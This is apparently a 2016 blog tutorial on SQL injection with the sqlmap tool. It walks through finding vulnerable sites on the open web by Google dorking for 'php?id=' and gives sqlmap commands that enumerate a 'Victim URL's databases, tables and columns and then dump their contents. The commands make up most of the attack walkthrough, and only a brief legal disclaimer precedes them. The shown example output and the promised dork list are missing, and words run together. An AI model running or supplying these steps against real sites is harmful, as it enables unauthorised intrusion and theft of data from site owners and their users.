Ready to Start Your Career?
June 13, 2016
SQL Injection Using SQLmap - [PART 1]
June 13, 2016
SQL, Structured Query Language, is a programming language that allows the user to manage data in a relational database management system (RDBMS) through the use of specially crafted strings. Although great for functionality, it can be disastrous if configured/crafted incorrectly. We can exploit this using the pentesting tool SQLmap.SQLmap is a penetration testing tool that automates the process of exploiting SQL injection flaws and SQL database takeover. More information on SQLmap can be found using Google, or the option -h. Requirements:-Basic understanding of SQL-SQLmap-Common SenseThis is for educational and research purposes only! Do not attempt to violate the law with anything contained here. Step 1: Identifying the TargetTo find a possibly vulnerable site, we'll Google dork search the term: "php?id=". A dork is an advance search using Google parameters such as "", site:, and filetype:A potentially vulnerable site looks something like this: https://mytarget.com/info.php?id=1 Step 2: Database EnumerationNow that we found a target, let's identify the databases.
sqlmap -u $url --batch --dbswhere $url is the target url. We have the database names; let's use this information to get the tables.
sqlmap -u $url --batch --table -D $databasenameWhere $url is the Victim URL and $databasename is the name of the database. With that information, we can discover the columns.
sqlmap -u $url --columns -D $databasename -T $tablenameWhere $url is the Victim URL, $databasename is the name of the database, and $tablename is the name of the table. Step 3: The DumpNow that we've found our target, let's dump what we have.
sqlmap -u $url --dump -D $databasename -T $tablenameAnd, we'll get something like this: That's it! I'll be posting again, so stay tuned!Bonus: Here's a list of other popular Google dork queries.